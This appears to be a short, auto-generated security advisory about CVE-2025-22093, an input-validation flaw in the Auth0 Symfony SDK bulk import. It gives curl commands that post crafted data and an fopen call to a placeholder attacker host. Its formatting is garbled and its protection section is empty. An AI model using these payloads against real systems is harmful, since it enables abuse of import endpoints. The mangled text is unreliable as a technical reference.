How the mentioned CVE works:
The CVE-2025-22093 vulnerability exists within the bulk user import functionality of the Auth0 Symfony SDK. The endpoint responsible for processing bulk user imports from files does not implement adequate validation on the supplied file path parameter. This lack of sanitization allows an attacker to provide a path that does not point to a local CSV file but instead uses a PHP wrapper like `php://input` or a remote URL with http://`. When the SDK attempts to read the file, it will process the attacker-controlled stream. Forphp://input, it reads the raw HTTP POST body, potentially allowing the upload of maliciously crafted data disguised as a CSV. This could lead to unexpected application behavior, errors, or the processing of invalid data, though the direct risk of code execution is low as the endpoint is designed for data parsing, not inclusion.file_get_contents(‘php://input’);`
Platform: Auth0 Symfony SDK
Version: <5.5.0
Vulnerability: Input Validation
Severity: Low

<h2 style="color: blue;">What Undercode Say:</h2>
`curl -X POST https://api.example.com/bulk-import -F "users_file=@/path/to/file.csv"`
`curl -X POST https://api.example.com/bulk-import -d "users_file=php://input" --data-binary @malicious.csv`
<h2 style="color: blue;">
`fopen(‘http://attacker-server.com/fake.csv’, ‘r’);`
How Exploit:
An attacker sends a POST request to the bulk import endpoint. Instead of a legitimate file, they specify a PHP wrapper protocol or a remote URL in the request parameter. The SDK, lacking validation, fetches and processes data from this provided source, which contains malformed or maliciously crafted content not intended for the import routine.
Protection from this CVE:
